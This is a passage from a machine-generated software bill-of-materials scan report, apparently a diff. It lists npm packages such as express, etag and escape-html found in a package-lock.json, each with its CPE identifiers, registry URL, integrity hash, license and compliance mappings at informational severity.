cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/engine.io-parser@5.2.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz + integrity: sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6de5b5b314bb1d48 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: entities 4.5.0' + title: entities 4.5.0 + description: 'Package discovered: entities 4.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3c365deec0186b44 + name: entities + version: 4.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-2-Clause + spdxExpression: BSD-2-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/entities@4.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/entities/-/entities-4.5.0.tgz + integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9ebfe3f940205a55 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: es-define-property 1.0.1' + title: es-define-property 1.0.1 + description: 'Package discovered: es-define-property 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 198a07fe3b41a7bb + name: es-define-property + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/es-define-property@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz + integrity: sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ce987dda52f0c354 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: es-errors 1.3.0' + title: es-errors 1.3.0 + description: 'Package discovered: es-errors 1.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 524e10cb2d7467ea + name: es-errors + version: 1.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/es-errors@1.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz + integrity: sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8e3c7c80273d6fd7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: es-object-atoms 1.1.1' + title: es-object-atoms 1.1.1 + description: 'Package discovered: es-object-atoms 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fa7ef7424a021d69 + name: es-object-atoms + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/es-object-atoms@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz + integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA== + dependencies: + es-errors: ^1.3.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cdf746578205af98 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: es-set-tostringtag 2.1.0' + title: es-set-tostringtag 2.1.0 + description: 'Package discovered: es-set-tostringtag 2.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8f498e19379b53ea + name: es-set-tostringtag + version: 2.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/es-set-tostringtag@2.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz + integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA== + dependencies: + es-errors: ^1.3.0 + get-intrinsic: ^1.2.6 + has-tostringtag: ^1.0.2 + hasown: ^2.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3d860225864c56d0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: escalade 3.2.0' + title: escalade 3.2.0 + description: 'Package discovered: escalade 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2a58ccd5fc44a7b2 + name: escalade + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/escalade@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz + integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2f35769c64d37fb5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: escape-html 1.0.3' + title: escape-html 1.0.3 + description: 'Package discovered: escape-html 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 94fc6050cdb348bc + name: escape-html + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/escape-html@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz + integrity: sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b31fcb4e8c7ac0d8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: etag 1.8.1' + title: etag 1.8.1 + description: 'Package discovered: etag 1.8.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4ddb33d9fc7b6ece + name: etag + version: 1.8.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/etag@1.8.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/etag/-/etag-1.8.1.tgz + integrity: sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 643445c96492a454 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: event-target-shim 5.0.1' + title: event-target-shim 5.0.1 + description: 'Package discovered: event-target-shim 5.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 419bcd6d1f4e7103 + name: event-target-shim + version: 5.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/event-target-shim@5.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz + integrity: sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: df7be298e5b5835f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: eventemitter3 4.0.7' + title: eventemitter3 4.0.7 + description: 'Package discovered: eventemitter3 4.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2bf11b6ac833063c + name: eventemitter3 + version: 4.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/eventemitter3@4.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz + integrity: sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8f3c29afa2938d65 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: events 3.3.0' + title: events 3.3.0 + description: 'Package discovered: events 3.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bca3d6fcf9ecc55d + name: events + version: 3.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/events@3.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/events/-/events-3.3.0.tgz + integrity: sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 42a06b319afe7e6e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: express 4.22.1' + title: express 4.22.1 + description: 'Package discovered: express 4.22.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7bcabe4027921ced + name: express + version: 4.22.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/express@4.22.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/express/-/express-4.22.1.tgz + integrity: sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g== + dependencies: + accepts: ~1.3.8 + array-flatten: 1.1.1 + body-parser: ~1.20.3 + content-disposition: ~0.5.4 + content-type: ~1.0.4 + cookie: ~0.7.1 + cookie-signature: ~1.0.6 + debug: 2.6.9 + depd: 2.0.0 + encodeurl: ~2.0.0 + escape-html: ~1.0.3 + etag: ~1.8.1 + finalhandler: ~1.3.1 + fresh: ~0.5.2 + http-errors: ~2.0.0 + merge-descriptors: 1.0.3 + methods: ~1.1.2 + on-finished: ~2.4.1 + parseurl: ~1.3.3 + path-to-regexp: ~0.1.12 + proxy-addr: ~2.0.7 + qs: ~6.14.0 + range-parser: ~1.2.1 + safe-buffer: 5.2.1 + send: ~0.19.0 + serve-static: ~1.16.2 + setprototypeof: 1.2.0 + statuses: ~2.0.1 + type-is: ~1.6.18 + utils-merge: 1.0.1 + vary: ~1.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ba97090edfd08e19 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: express-rate-limit 8.5.1' + title: express-rate-limit 8.5.1 + description: 'Package discovered: express-rate-limit 8.5.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 41f99f3613a4245b + name: express-rate-limit + version: 8.5.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/express-rate-limit@8.5.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz + integrity: sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ== + dependencies: + ip-address: ^10.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f780fc7a8f12c92d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: extend 3.0.2' + title: extend 3.0.2 + description: 'Package discovered: extend 3.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c7f94791a09e5a4e + name: extend + version: 3.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/extend@3.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/extend/-/extend-3.0.2.tgz + integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9507c5e5a8d55fc3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: farmhash-modern 1.1.0' + title: farmhash-modern 1.1.0 + description: 'Package discovered: farmhash-modern 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2efb607597053214 + name: farmhash-modern + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + 